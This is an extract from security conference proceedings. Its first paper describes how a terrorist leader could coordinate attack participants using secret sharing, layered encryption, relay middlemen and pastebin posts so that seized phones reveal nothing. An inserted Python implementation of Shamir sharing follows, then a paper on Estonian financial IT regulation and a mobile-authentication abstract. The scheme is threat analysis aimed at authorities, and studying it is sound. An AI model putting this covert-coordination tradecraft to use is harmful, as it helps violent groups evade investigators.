This algorithm has a space and time complexity both in O(n^2), and can be implemented easily in Python (listing 2).<br />
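The scheme of Sections 2.3 and 2.4 as an added example; this is not the paper's listing 2 nor any code of the authors. It builds Shamir shares over a prime field, maps a password to a share's X coordinate, and recovers a0 by evaluating the Neville-Aitken tableau at x = 0; PRIME, the SHA-256 password mapping and every function name are assumptions of this example.

```python
"""Shamir's (k, n) secret sharing with Neville-Aitken reconstruction of a0.

Added example, not code from the paper. Shares are points (X, f(X)) on a
random polynomial over the prime field GF(PRIME); the secret is f(0) = a0.
PRIME, the password-to-integer mapping and the function names are assumptions.
"""
import hashlib
import secrets

PRIME = (1 << 127) - 1  # assumed field size: the Mersenne prime 2^127 - 1


def make_polynomial(secret, threshold, randbelow=secrets.randbelow):
    """Coefficients [a0, a1, ..., a_{k-1}] with a0 = secret, the rest random."""
    if not 0 <= secret < PRIME:
        raise ValueError("secret must lie in [0, PRIME)")
    if threshold < 2:
        raise ValueError("threshold must be at least 2")
    return [secret] + [randbelow(PRIME) for _ in range(threshold - 1)]


def evaluate(coeffs, x):
    """f(x) mod PRIME by Horner's rule."""
    y = 0
    for a in reversed(coeffs):
        y = (y * x + a) % PRIME
    return y


def share_at(coeffs, x):
    """One share, the point (x, f(x)). x = 0 is refused: f(0) is the secret."""
    x %= PRIME
    if x == 0:
        raise ValueError("share abscissa must be non-zero")
    return (x, evaluate(coeffs, x))


def password_to_x(password):
    """The paper's 'password transformed into an integer' (assumed: SHA-256 mod PRIME)."""
    digest = hashlib.sha256(password.encode("utf-8")).digest()
    return int.from_bytes(digest, "big") % PRIME


def neville_at_zero(points):
    """Interpolate `points` and return f(0) = a0 using the Neville-Aitken tableau.

    P[i][i] = y_i
    P[i][j] = ((0 - x_j) * P[i][j-1] + (x_i - 0) * P[i+1][j]) / (x_i - x_j)
    Division is a modular inverse in GF(PRIME). O(n^2) time and space, as the
    paper notes; the top-right cell P[0][n-1] is the value at x = 0.
    """
    n = len(points)
    xs = [x % PRIME for x, _ in points]
    if len(set(xs)) != n:
        raise ValueError("share abscissae must be distinct")
    p = [[0] * n for _ in range(n)]
    for i, (_, y) in enumerate(points):
        p[i][i] = y % PRIME
    for span in range(1, n):
        for i in range(n - span):
            j = i + span
            num = (xs[i] * p[i + 1][j] - xs[j] * p[i][j - 1]) % PRIME
            p[i][j] = num * pow(xs[i] - xs[j], -1, PRIME) % PRIME
    return p[0][n - 1]


def leader_setup(secret, password, randbelow=secrets.randbelow):
    """Sections 2.1/2.2 with threshold 3: the leader's points (X1..X3) and the
    participant's password point (X4, Y4) all lie on one degree-2 polynomial."""
    coeffs = make_polynomial(secret, 3, randbelow)
    leader_points = [share_at(coeffs, x) for x in (1, 2, 3)]
    password_point = share_at(coeffs, password_to_x(password))
    return leader_points, password_point


def participant_decode_key(sent_point, stored_point, password_point):
    """Section 2.2: combine the point the leader sent, the point stored on the
    phone and the password point; the result a0 is the message key."""
    return neville_at_zero([sent_point, stored_point, password_point])


def seized_phone_view(stored_points, guessed_point):
    """A phone holding only two points of a threshold-3 scheme: any third point
    an examiner guesses completes *some* parabola, so the returned value is
    arbitrary. Two shares carry no information about a0."""
    return neville_at_zero(list(stored_points) + [guessed_point])


if __name__ == "__main__":
    key = secrets.randbelow(PRIME)
    leader, pw_point = leader_setup(key, "example-password")  # constructed values
    assert participant_decode_key(leader[1], leader[2], pw_point) == key
    assert neville_at_zero(leader) == key  # the leader alone also holds 3 points
    print("key recovered from (X2,Y2), (X3,Y3) and the password point")
```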
3. Communication<br />
There are plenty of ways a leader can communicate with a given “jihadist”. We expose some of them in the following section. The first way is what we could call “standard”, while the second uses some new technology.<br />
First, we explain how the leader can send some data to a given person in a “secure” way, in the sense that if at some point a communication is insecure, it will not expose the data. We also explain how he can send data in a discreet way, so that the communication is not too suspicious.<br />
So, the leader has some data to be sent to a specific person (we will call him X). The easiest way to do it would be to just send the plain data, but this method has some drawbacks:<br />
The connection between X and the leader is easy to make.<br />
Each time the leader wants to communicate with someone, the communication is direct. So the leader is the central point of all the communications and thus is easily recognizable (although it is possible that the leader uses a unique SIM card each time).<br />
The data is not protected against eavesdropping, so “anyone” can access it.<br />
In order to address these issues, we propose the following scenario:<br />
The leader (as well as all the people involved in the attack) has a phone in which a public-private key pair is present. Moreover, each participant has his own password (which is given at some time, in a training camp for example).<br />
The leader, who wants his data to be available only to X, will encrypt it with X’s public key (so only X’s phone is able to decrypt the data). The leader will then do a secret sharing by splitting the ciphertext obtained into N + 1 elements (fixing one part of this secret to the password of X), N being the number of middlemen he wants to use to transfer the ciphertext to X.<br />
As an example, let’s say that N = 3. We will call these three intermediates Y, Z and T. The leader, who knows the phone number of each participant, sends to Y, Z and T an encrypted message (using each participant’s public key) containing a time, a destination, and one part of the secret (but not the password one) to send to X. Each participant then has to decrypt the message to learn that he has to send some data to some destination at some given time. (Note: the time need not be the same for all the participants, as the construction of the message can be spread over time for more discretion.)<br />
When X finally receives all the parts he can recover the secret by adding his password to the data received. Thus, if his phone is taken by some police force, only X is able to recover the data.<br />
The process can be a little more elaborate than this, as the leader may use more than three intermediates, and can use a different scheme. Indeed, instead of having only one “level of indirection” with X, it is possible to encapsulate one level into another. Let’s take our Y, Z and T again. The leader can encrypt some data destined for X with X’s public key. Then, using T’s public key, he encrypts the already encrypted data together with the time at which the delivery has to be done and the number of X (the destination). Then he does the same for Z (he encrypts the encrypted data to be sent to T together with the time at which the delivery has to be done and the number of T) and for Y.<br />
Finally, the leader sends the encrypted data to Y, who will decrypt it and send the result to Z at the given time, and so on until at last X gets the original data that the leader wanted to send him.<br />
Of course, the leader can use these two ways at the same time. These schemes have some drawbacks though: all the parts derived from the secret have to be known to be able to recover the data, and every participant ends up knowing each other’s phone number. These schemes can be modified to be tolerant to the loss of one or more parts by using the password of a participant as the private key of the encryption process. So the leader can use a “classic” secret sharing with the secret being the data to be sent, encrypted with the public key corresponding to X’s password.<br />
In order to address the problem of participants ending up knowing the phone numbers of others, a different way to communicate can be used. As an example, the leader may use a website to communicate indirectly by posting some messages containing the right data.<br />
Other technologies can be used, such as the following: the communication from the leader to a specific “jihadist” can be performed with Perseus in order to have a low entropy. The leader encodes the message with the secret found from the secret sharing. When a “jihadist” receives a message, he uses his password and the latest value from the leader to extract the secret and decode the message. It will work only if the password and the value are correct.<br />
Figure 3: Communication between a leader and a jihadist with Perseus<br />
4. How can two (or more) individuals recognize each other to perform the attack<br />
In this section we explain how a leader can set up an attack in which two (or more) participants are able to recognize each other in order to perform the attack. The idea, which is pretty simple, is the following: the leader generates some secret S to be shared (e.g. the instructions of the attack) and divides it depending on the number of participants: if there are N participants, the secret has to be split into 2N−1 parts, with N parts needed to recover the data.<br />
N of these parts have to be the passwords of the participants; the others (N−1) are generated randomly. When the attack has to be done, the leader chooses a way for all the participants to communicate with each other (for example a website, like pastebin.com) and sends it to each participant, together with one part derived from the secret. Some participants may receive the same part. Then each of them communicates with the others (for example, in the case of pastebin, they just post the part they were given). All participants then have access to N−1 parts of the secret, and they can recover the secret with their own password.<br />
5. Arrest<br />
If a “jihadist” is arrested by government authorities, all the information is on the mobile phone. So they will find:<br />
X3, Y3,<br />
X2, Y2,<br />
Encoded messages.<br />
They do not have enough information to solve the secret sharing on the mobile phone and decode the messages, because the last piece of information is known only by the “jihadist”.<br />
Figure 4: Impossible to find enough information due to the scheme<br />
6. Conclusion<br />
The increasing number of new devices brings new attack vectors that the authorities have to take into account. Indeed, mobile phones embed more and more powerful components, making them a new threat to be considered. They are not really checked at airports, and when they are, it is not an easy task to access all the data inside: the phone has to be jailbroken / rooted, and doing so for every passenger is not really an option. As we saw, they can be used to establish communication (it is their primary use after all) between criminals. The communications can be secured by using some “everyday cryptography” (asymmetric encryption), or by using new techniques like Perseus. The techniques presented in this paper are mostly not new (Shamir’s Secret Sharing is more than 30 years old), but they are not yet exploited.<br />
Acknowledgement<br />
Thanks to Eric Filiol for the original idea and Robert Erra for reviewing the paper.<br />
References<br />
Filiol, Eric (2010), PERSEUS Technology: New Trends in Information and Communication Security<br />
Madrid (2004), http://en.wikipedia.org/wiki/2004_Madrid_train_bombings<br />
Shamir, Adi (1979), “How to share a secret”, Communications of the ACM 22 (11): 612–613<br />
Neville (1992), Press, William; Teukolsky, Saul; Vetterling, William and Flannery, Brian (1992). “§3.1 Polynomial Interpolation and Extrapolation”. Numerical Recipes in C: The Art of Scientific Computing (2nd edition).<br />
TheRegister (2011), http://www.theregister.co.uk/2011/03/22/ba_jihadist_trial_sentencing/<br />
Regulatory Compliance to Ensure Information Security:<br />
Financial Supervision Perspective<br />
Andro Kull<br />
School of Information Sciences at the University of Tampere, Finland<br />
Andro.Kull@fi.ee<br />
Abstract: The last financial crisis shows that more control is necessary for the financial sector. Controls should be planned and realized at the international, country and bank levels, because everyone who has to use financial services wants to be sure that data about their assets are secure. Almost everyone uses the electronic services of financial institutions, and therefore information security issues cannot be overemphasized. To increase security in the computerized operations of financial institutions, a certain supervisory authorization must be established. In order to answer such questions as “How much security is necessary?”, “How much security is sufficient?” and “How to be sure that operations are secure?”, a systematic approach to assess the state of security is necessary. In the current case, these questions should be answered by financial supervisors to provide assurance that people’s money is safe in banks and in other financial institutions. In this paper we propose a new compliance assessment and monitoring method for these purposes. The key concept presented and used throughout the research is named technology assurance (TA); it is all that gives the feeling of security in using technology, and it may be treated as a synonym for the term information assurance (IA). To ensure technology assurance, the lowest steps have to be passed to reach a higher level. Technology assurance presumes that business processes are well organized, information assets and IT governance are well established and IT risks are managed, in order to build up higher-level assurance such as information security measures and information systems/information security auditing, and to reach the highest levels such as business continuity preparation. To answer the main research questions mentioned above, sub-questions such as “How much to regulate?” should be answered. Considering some facts about Estonia and its financial sector (Estonia is a member of the European Union, the bigger banks in Estonia are subsidiaries, and the Euro was launched recently), it is essential to be in accordance with European practices in developing our standards to regulate the financial sector and the IT field. During the research, a survey about current arrangements in 29 European countries was carried out, and this paper describes the survey focusing on the results. The question was: how do the European countries regulate the financial sector IT field, and what requirements should financial institutions fulfil to ensure the security of electronic operations? The main results of the survey show that the most important issue to cover with regulations was IT risk management; the business continuity process and information security policy were also covered in most cases. About half of the respondents highlight the need to regulate IT outsourcing and access control management issues. In general, the survey confirms the trend towards stricter regulation of IT in the financial sector, and Estonia tends to be at the top level regarding regulations.<br />
Keywords: information technology, information security, business continuity, compliance assessment, financial sector<br />
1. Introduction<br />
The survey described in this paper is part of a bigger research project called “A Method for Continuous Information Technology Supervision: The Case of the Estonian Financial Sector”. In the introduction I give an overview of the whole study so that the reader can easily understand the content and purpose of the survey presented below.<br />
The literature review presented during the research shows a number of theories, solutions, recommendations, best practices and standards in connection with information technology and information security, for example COBIT (ISACA, 2010), SABSA (2010), COSO (2010), CMM (1993), GAIT (Institute of Internal Auditors, 2010), OCTAVE (CMU/SEI, 1999) etc. The questions and topics are highlighted and relevant examples from different studies are presented, and afterwards, through the steps of the research, our own approach is presented to deal with the problems and topics. From a scientific point of view, the author sees too little attention paid to using existing knowledge for a certain task and combining different approaches to produce new ones.<br />
Next, the IT supervision approach is discussed with the purpose of highlighting the features of this area. An overview of IT supervision activities, i.e. off-site and on-site activities, is given. The tendency shows that a systematic approach is needed for IT supervision. A new IT supervision method will be proposed to support the off-site inspections and should give the possibility to enter the results of on-site inspections.<br />
Going further, IT risks are examined in more detail from the supervisory perspective, and there are some differences from the traditional IT risk approach. Supervision distinguishes two principal risk sides: risks before control and risk controls. Concrete risk scales are described and presented.<br />
The research continues with requirements to reduce the level of risk. First the process of working out the advisory guidelines is described, and the guidelines in connection with the IT field are drawn up using the key concept, i.e. for IT governance, information security and business continuity. To conclude with the requirements, a common approach at the European level is surveyed and the main results of this survey are pointed out.<br />
To motivate the importance of producing the field regulations, many arguments may be highlighted. First, advisory guidelines are the main tool to enforce supervised entities’ duties to ensure secure operations, and for supervisors in conducting IT supervision activities. Also, considering the connections with the European level (European Union membership, the Euro, parent banks from Europe, the same high-level approaches such as Basel II), the local requirements should conform with general practice.<br />
The research continues with an analysis of how the stated requirements may influence the supervised entities and with determining the criteria for requirements. To deal with the possible costs of initiatives to conform to supervisory requirements, the supervised entities were studied as to how they conform to the requirements today and whether there is a large gap between existing and required measures. As a conclusion we have gained some confidence that the requirements stated before are not too burdensome for supervised entities and that, in general, the main activities are carried out to meet the requirements.<br />
The study proceeds with finding out the criteria to meet the requirements. The first version of a relevant handbook is compiled, and this handbook has to be subject to continuous improvement considering the real assessments, the financial sector changes, etc. Compliance criteria and weighting help to answer the question of what kinds of criteria should be used to ensure compliance with requirements and how to assure equal treatment of market participants. The criteria handbook is the most valuable outcome of the whole research.<br />
The research proceeds with scoring issues based on the requirements and criteria stated beforehand. Some widely known security assessment approaches are described and possible measures and metrics are studied. Using this knowledge, the scoring scale for IT supervision is proposed and a real use case is conducted. This is the first attempt to check the applicability of the criteria handbook in practice.<br />
The research continues with determining the systematic approach for making the assessment. We give an overview of the attempt to realize the IT supervision approach in an appropriate IT solution. The need for an IT solution to deal systematically with compliance assessment is explained, and a pre-analysis of the expected solution is proposed following the context description and the functional and non-functional requirements analysis. The basics are outlined to create an IT solution for compliance scoring.<br />
The research proceeds with a summation of the previous results and putting together the method, i.e. all the pieces studied beforehand, for continuous information technology supervision. Once the method is implemented in practice, further examination begins to determine whether those entities with good compliance with IT requirements experience lower losses in the case of IT incidents. Based on that examination, if it is not true the reasons will be explored, and next the method will be improved. The main purpose of the research (to systematically examine the core content of IT supervision) is achieved, and the main result (an IT supervision method) will be implemented into everyday supervision work.<br />
2. European supervision<br />
The study “Requirements for IT in European supervision authorities” helps to answer the question of what requirements are reasonable to ensure security and which of them are obligatory.<br />
The research question was: how do European financial supervision authorities regulate the IT area?<br />
Next, a description of the study of requirements in the IT area in European countries’ supervision authorities follows.<br />
2.1 Research model<br />
The idea considered throughout the study is to combine all sufficient best practices and international standards, use the set for building an appropriate method for IT supervision and apply it to the Estonian financial sector. The key concept presented in Figure 2.1 and used throughout the research is named technology assurance; it is all that gives the feeling of security in using technology. This may be a synonym for the term information assurance (IA).<br />
To ensure technology assurance, the lowest steps have to be passed to reach a higher level. Technology assurance presumes that business processes are well organized, information assets and IT governance have to be well established, etc., to build up higher-level assurance such as a working business continuity process.<br />
COMPLIANCE ASSESSMENT – internal requirements, external requirements, compliance criteria, compliance assessment, compliance monitoring<br />
IT AUDITING – security audit, IT project audit, system audit, technology audit<br />
BUSINESS CONTINUITY – business continuity planning, recovery planning, recovery testing<br />
INFORMATION SECURITY – information security management, IT security measures<br />
IT RISK MANAGEMENT – business risks, IT risk assessment, measures for risk mitigation<br />
IT GOVERNANCE – IT strategy, IT management, IT organization, outsourcing, IT development, IT maintenance<br />
INFORMATION ASSETS – identifying all critical and important information assets, responsibilities<br />
BUSINESS PROCESSES<br />
CRITICAL INFRASTRUCTURE PROTECTION<br />
Figure 1: Elements of IT assurance (layered diagram, listed top to bottom)<br />
A study on how European supervision authorities regulate the IT area was conducted in August 2008. The 27 European Union countries, Norway and Croatia were surveyed.<br />
The study method was a systematic review of the collected documentation. The review was organized in such a way that all relevant keywords were accounted for, and if there was a description in connection with a certain keyword, that fact was noted. The keywords were proposed as the areas in connection with IT that may be important to regulate, and the keywords of the key concept were also the focus. In setting up the keywords, the IT field was divided into three parts (IT governance, information security and business continuity) and lower-level topics.<br />
2.2 Data gathering<br />
The information and materials about the requirements were researched on the relevant web pages, and a simple keyword search gave results, i.e. the regulatory documents, for only one third of the countries. Considering the poor results of the web search, an e-mail was compiled and sent to the generic e-mail addresses of the supervision authorities. The e-mail contained the following request:<br />
“I am writing to you on behalf of the Estonian Financial Supervision Authority, where I am responsible for IT field supervision. Since we are conducting a small survey regarding what kind of requirements are in place for the IT field in the financial sector throughout European Union Member States, we have already examined your web-sites, but we have been unable to locate clear documents or links to the relevant information. We are interested in the whole financial sector (banking, insurance, etc.) and we are covering the main components of IT (IT governance, information security, business continuity). The results of this survey will be used for the improvement of our regulations in the IT field of supervised entities.<br />
Considering the information above, please give a short answer to the following questions:<br />
What kinds of regulations contain requirements for the IT field of supervised entities in your country?<br />
Are these regulations freely available via the Internet?<br />
If so, is it possible to provide the exact link to the adequate information?<br />
If not, is it possible to send the relevant files via e-mail?<br />
In case the relevant information is only for internal use, could you please describe what the common demands for the IT field of supervised entities are?”<br />
Responses were received to about half of the e-mails sent, accounting for another third of the participating countries. The remaining third of the countries did not answer the e-mail and keyword searches also failed to provide a result, so there is no information about whether these countries have established IT requirements or not, and what kind of requirements they may be. The results of the study are composed on the basis of two thirds of the participating countries, and the author considers this adequate enough to draw reasonable conclusions.<br />
2.3 Data analysis<br />
Categories and statistics about the different areas are illustrated with the next three figures, following the main themes.<br />
Figure 2: Summary of study of European supervision – IT governance (bar chart, number of countries per topic on a 0–20 axis; topics: Information architecture, IT organization, IT strategy, IT risk management, IT Governance, IT development, Change management, IT outsourcing, Problem management, Monitoring)<br />
Information architecture is mentioned by only two countries. This is not surprising, because decisions about infrastructure should mainly depend on business needs. Still, it may also be important to supervisors because of the possibility to trace where data and systems ultimately reside.<br />
IT organization certainly should be appropriate; segregation of duties has to be maintained, etc.<br />
IT strategy could be a valuable source for detecting which developments are planned and for considering the possible risks beforehand.<br />
301
Andro Kull<br />
IT risk management is the most frequently marked point and means that the majority of respondents require the supervised entities themselves to carry out the risk assessments and to decide on the appropriate measures. Still, a supervisory risk assessment will be positioned next to it.<br />
IT development should take into account the information security needs; for example, system controls, logging of operations, etc. have to be implemented.<br />
Change management seems to become more and more important as the functionality of systems and the data loads grow.<br />
IT outsourcing is certainly one possible source of risks, and outsourcing partners have to be in the supervisors’ focus.<br />
Problem management is a corrective measure and goes together with incident management.<br />
Monitoring is a detective measure. It is right to presume that supervised entities have implemented procedures and systems to detect deviations from normal functioning.<br />
As a conclusion for the IT governance topics, a lot of attention is paid to IT risk management, outsourcing and monitoring. Less attention is paid to information architecture, which indicates that the architecture is left to the competence of the supervised entities.<br />
[Figure 3 is a bar chart of which only the labels survived extraction. Vertical axis: number of countries, 0 to 16. Categories: Security policy, Security organization structure, IT Security Governance, Asset classification, Physical Security, Communications security, Access Control Management.]<br />
Figure 3: Summary of study of European supervision – IT security governance<br />
Security policy should clearly reflect the needs and objectives for information security, as well as the roles and responsibilities.<br />
Establishing a security organization may be a subject for consideration as to whether it is absolutely necessary for each entity, i.e. for bigger banks as well as for smaller investment firms. In any case, clear responsibility for information security issues should be confirmed.<br />
Asset classification is in many cases not regulated; the reason could be that financial information and personal data are sensitive by default and need to be protected.<br />
Physical security measures are mentioned in half of the cases. Here there may be the possibility to link with other standards, for example for building a server room.<br />
302
Communications security seems to be a growing area, and tighter regulation can be expected over time.<br />
Access control management is quite well regulated. Access management is also a direct link between business and IT, and all the categories of information security measures should be accounted for – physical, organizational and technical.<br />
As a conclusion for information security governance, a lot of attention is paid to the information security policy and to access control management. Less attention is paid to the information security organization and to information asset classification.<br />
[Figure 4 is a bar chart of which only the labels survived extraction. Vertical axis: number of countries, 0 to 18. Categories: Business continuity process, Business continuity plan, Business continuity testing.]<br />
Figure 4: Summary of study of European supervision – business continuity<br />
A business continuity process is required in most cases. Business continuity plans are required in most cases, and testing of the business continuity plan is required in about half of the cases. However, the existence of such a plan does not guarantee that it works, so business continuity testing seems to be an obvious requirement.<br />
Business continuity regulation follows a certain logic: it starts with requirements for the process and continues with planning and testing as the outcomes of this process.<br />
2.4 Conclusion<br />
As a first conclusion, eight countries have a rather high level of regulation, five countries have mid-level regulation and nine countries have a low level of information technology regulation. There is no information about six of the countries, and one of the respondents announced that they do not have specific regulations for information technology. As a next conclusion, there is a remarkable difference in the strength of IT field regulation between countries. In addition to the difference in “must” and “shall” usage, the levels of regulation also vary from guidelines to acts.<br />
A common conclusion is that all the main areas and categories are somehow covered, meaning classic information security. To illustrate the idea, Table 2.1 is presented.<br />
For example, the measure “access control management” as stated by the guidelines is a preventive measure and may be implemented through organizational, technical and physical activities, while the measure “monitoring” is a detective one and is mostly implemented through technical processes.<br />
303
The presented classic information security matrix is a useful evaluation tool for checking that all areas and categories are taken into account when concluding with requirements.<br />
Table 1: Categories of information security measures<br />
                         Preventive measures   Detective measures   Corrective measures<br />
Organizational measures           X                     X                     X<br />
Technical measures                X                     X                     X<br />
Physical measures                 X                     X                     X<br />
The results of the study on how the IT field is regulated in European countries could be used further as follows:<br />
In setting up the requirements for information security in Estonia, we consider mainly excellent examples such as Greece, Finland, Slovakia, the Netherlands and Latvia;<br />
Later, when analyzing all of the requirements and pointing out the criteria for assessment, we can use as a comparison the descriptions of those requirements which are handled thoroughly.<br />
Going forward, the real circumstances will be considered. Estonia had two regulations for the IT field in the financial sector, developed for IT governance and business continuity. After the survey, a need for an additional regulation for information security arose immediately.<br />
3. Estonian supervision<br />
The results of the survey among European financial supervision authorities provided some input for completing the Estonian regulative guidelines in the field of information security.<br />
3.1 Advisory guidel<strong>in</strong>es process<br />
The initiative for creating advisory guidelines comes from the Estonian Financial Supervision Authority (EFSA), in order to regulate more precisely the areas important for the stability of the market.<br />
There is a need for more concrete regulation of the market. First, it helps subjects to set up their own specific internal regulations and, second, it helps to explain the importance of IT and information security measures and the need for investments to implement them.<br />
After the first version of the guidelines is drafted, it is discussed inside the FSA. After that it goes to the market participants for comments. Considering the feedback, next versions will be developed and discussed. After common consensus on the next version, the guidelines will be published.<br />
Generally, the version which is established will be introduced to all interested parties in a relevant seminar.<br />
Between the development and establishment of the guidelines an adequate time buffer is left, so that the subjects can complete the actions needed to be in compliance with the new regulations.<br />
3.2 F<strong>in</strong>ancial Supervision Authority<br />
The Estonian Financial Supervision Authority’s objectives of financial supervision (2010) state that: “The main objective of supervision is to ensure that financial institutions are able to meet their obligations to the customers in the future - pay out deposits, insurance losses or pension contributions, etc. An important task of the Financial Supervision Authority is also to help to increase the efficiency of the Estonian financial sector, avoid systemic risks, and prevent the abuse of the financial sector for criminal purposes. The work of the Authority also involves explanation of which are the risks for the customers and provide information and support to them in choosing financial services.”<br />
This statement gives the first indication that risk assessment and management should be implemented into financial institutions’ everyday business.<br />
304<br />
3.3 Credit Institutions Act<br />
The initiative for creating more precise requirements to regulate IT in the financial sector comes, for example, from the Credit Institutions Act through the following statements:<br />
“All data and assessments which are known to a credit institution concerning the clients of the credit institution or other credit institutions are deemed to be information subject to banking secrecy.<br />
The managers and employees of a credit institution and other persons who have access to information subject to banking secrecy are required to process the data which is subject to banking secrecy in conformity to the Personal Data Protection Act and maintain the confidentiality of such information indefinitely, unless otherwise provided for in this Act.”<br />
The guidelines must cover the most important fields stated in the act and also in the key concept – IT governance, information security and business continuity.<br />
For IT governance, § 131 section 6 states: “In order to apply for authorization, the members of the management board entered in the memorandum of association or registry card of the company being founded or operating (hereinafter applicant) shall submit a written application and the following documents and information and other technological means and systems, security systems, control mechanisms and systems needed for provision of the planned financial services”.<br />
§ 55 section 8: “Among other obligations, the management board is required to ensure the existence and functioning of systems to guarantee that information necessary for employees of the credit institution to perform their duties is communicated thereto in a timely manner;”<br />
For information security, § 55 section 9 states: “Among other obligations, the management board is required to ensure the safety and regular monitoring of information technology systems used by the credit institution and systems used for the safekeeping of assets of clients.”<br />
For business continuity, § 82 section 3 states: “A credit institution must prepare and apply operational constancy plans in order to guarantee the restoration and continuity of business activities in the part of all essential business processes.”<br />
3.4 EFSA guidel<strong>in</strong>es<br />
Although the legislative requirements are not precise, these statements give an indication of which areas have to be under consideration. In the supervisory sense, the requirements from legislation have to be filled with content. This gives the basis for the Financial Supervision Authority’s development and implementation guidelines in the information technology areas, which are freely available:<br />
Requirements for the organization the field of information technology (2010);<br />
Requirements for the organization of the field of information security (2010);<br />
Requirements for organizing the business continuity process of supervised entities (2010).<br />
The main practical outcome for Estonia of surveying the European supervision requirements was the indication to change two existing guidelines, i.e. the requirements for the organization of the field of information technology and the requirements for organizing the business continuity process, and to create a new one, i.e. the requirements for the organization of the field of information security. It is true that the guidelines mostly give assurance for the inherent risks in the financial sector. For example, it is stated that there should be a person responsible for information security, but it is unclear which concrete risks this will mitigate. However, the guidelines are important in providing the basis for the expectations of the supervision authority and for the obligations of the supervised entity. In this light, it is obvious that to assess compliance with these requirements and to monitor real risks, a more detailed supervision approach is needed. The research goes further to develop an appropriate criteria handbook and assessment solutions for these purposes.<br />
4. Discussion<br />
Next, some common findings, lessons learned and proposals are discussed. First, the proposed key concept seems to work: the common understanding at the European level is that regulations in the financial sector and the IT field revolve around the given keywords.<br />
305
Risk assessment was mentioned in the survey as the most critical issue to regulate. Questions arise in case the risk assessments by the supervised entities and the risk assessment by the supervision authority mismatch. To address such problems, higher-level risk management approaches such as Basel II and Solvency II are proposed. These approaches deal with risk pricing and the respective capital requirements.<br />
One general question throughout the survey and the supervision authority’s guidelines process was the mandate of regulative guidelines. Some European countries use “must”, others use the softer formulation “shall”. Estonia decided to use the “shall” form because of the range of the guidelines, which covers bigger banks and also small investment firms.<br />
A connected question is the mandate of the guidelines document – it is not a law, which is mandatory, and it is not a standard, which is optional. The Estonian approach lies between them and uses the term “comply or explain”. The “comply or explain” principle should be taken into account in the application of these guidelines: if necessary, a supervised entity shall be able to explain why it is not applying or is only partly applying any of the paragraphs of these guidelines. The timing of regulations is also a point of discussion. As new threats occur, the requirements may change, and the question is what the right time for these changes is. The possibilities vary from a long period before to a long period after. One example of such new trends is security in cloud computing. The recommendations from ENISA (2011, p. 9) for governments indicate the need for additional risk assessment when using cloud computing technologies for critical information infrastructure. In Estonia, for example, electronic banking is considered an essential service, and such services are regulated by the Emergency Act (Estonian Ministry of the Interior, 2009).<br />
As a wider conclusion, the regulations are to be the subject of continuous review and improvement.<br />
Considering the whole research, one may ask whether such a complicated assessment approach is reasonable to develop and implement if there are many alternatives for assessing the subjects, for example CMM (2010), to name one of the best known. The answer, which opens up the whole essence of the research and of the solution for IT supervision, is that we do not need to score the enterprises in the financial sector, but to find out the most critical risk areas connected with IT inside the supervised entities.<br />
In implementing the IT supervision method described above in practice, the proposal is rather to also consider external risks and to try to continuously integrate them into the method.<br />
References<br />
Carnegie Mellon Software Engineering Institute (CMU/SEI) (1999) OCTAVE - Operationally Critical Threat, Asset, and Vulnerability Evaluation Framework. Technical report, CMU/SEI-99-TR-017, ESC-TR-99-017.<br />
Committee of Sponsoring Organizations (COSO) (2010) COSO framework, [online], http://www.coso.org. Accessed at 10.08.2010.<br />
Estonian Financial Supervision Authority (2010) Objective of Financial Supervision, [online], http://www.fi.ee/index.php?id=580. Accessed at 26.04.2011.<br />
Estonian Financial Supervision Authority (2010) Requirements for Organizing the Business Continuity Process of Supervised Entities, [online], http://www.fi.ee/failid/Business_continuity.pdf. Accessed at 26.04.2011.<br />
Estonian Financial Supervision Authority (2010) Requirements for the organization of the field of information security, [online], http://www.fi.ee/failid/information_security.pdf. Accessed at 26.04.2011.<br />
Estonian Financial Supervision Authority (2010) Requirements for the organization the field of information technology, [online], http://www.fi.ee/failid/IT_governance.pdf. Accessed at 26.04.2011.<br />
Estonian Ministry of the Interior (2009) Emergency Act, [online], http://www.legaltext.ee/et/andmebaas/tekst.asp?loc=text&dok=XXXXX26&keel=en&pg=1&ptyyp=RT&tyyp=X&query=h%E4daolukorra. Accessed at 26.04.2011.<br />
European Network and Information Security Agency (2010) Security & Resilience in Governmental Clouds, Making an informed decision, [online], http://www.enisa.europa.eu/act/rm/emerging-and-futurerisk/deliverables/security-and-resilience-in-governmental-clouds/at_download/fullReport. Accessed at 27.01.2011.<br />
Institute of Internal Auditors (2010) GAIT - A risk-based approach to assessing the scope of IT General Controls, [online], http://www.theiia.org/guidance/standards-and-guidance/ippf/practice-guides/gait/. Accessed at 21.06.2010.<br />
ISACA (2010) COBIT - Control Objectives for Information and related Technology, [online], https://www.isaca.org/. Accessed at 29.03.2010.<br />
SABSA (2010) SABSA - Sherwood Applied Business Security Architecture, [online], http://www.sabsa.org/. Accessed at 17.08.2010.<br />
Software Engineering Institute (1993) CMM – Capability Maturity Model, [online], http://www.sei.cmu.edu/index.cfm. Accessed at 18.07.2010.<br />
306
Behaviour Profiling for Transparent Authentication for Mobile Devices<br />
Fudong Li 1, Nathan Clarke 1, 2, Maria Papadaki 1 and Paul Dowland 1<br />
1 University of Plymouth, UK<br />
2 Edith Cowan University, Perth, Western Australia<br />
info@cscan.org<br />
Abstract: Since the first handheld cellular phone was introduced in the 1970s, the mobile phone has changed significantly both in terms of popularity and functionality. With more than 4.6 billion subscribers around the world, it has become a ubiquitous device in our daily life. Apart from the traditional telephony and text messaging services, people are enjoying a much wider range of mobile services over a variety of network connections in the form of mobile applications. Although a number of security mechanisms such as authentication, antivirus, and firewall applications are available, it is still difficult to keep up with the various mobile threats (i.e. service fraud, mobile malware and SMS phishing); hence, additional security measures should be taken into consideration. This paper proposes a novel behaviour-based profiling technique that uses a mobile user’s application usage to detect abnormal mobile activities. The experiment employed the MIT Reality dataset. For data processing purposes and also to maximise the number of participants, one month (24/10/2004-20/11/2004) of users’ application usage with a total of 44,529 log entries was extracted from the original dataset. It was further divided to form three subsets: two intra-application datasets compiled from telephone and message data, and an inter-application dataset containing the rest of the mobile applications. Based upon the experiment plan, a user’s profile was built using either static or dynamic profiles, and the best experimental results for the telephone, text message, and application-level applications were an EER (Equal Error Rate) of 5.4%, 2.2% and 13.5% respectively. Whilst some users were difficult to classify, a significant proportion fell within the performance expectations of a behavioural biometric, and therefore a behaviour profiling system on mobile devices is able to detect anomalies during the use of the mobile device. Incorporated within a wider authentication system, this biometric would enable transparent and continuous authentication of the user, thereby maximising user acceptance and security.<br />
Keywords: mobile device, behaviour profiling, applications, transparent authentication<br />
1. Introduction<br />
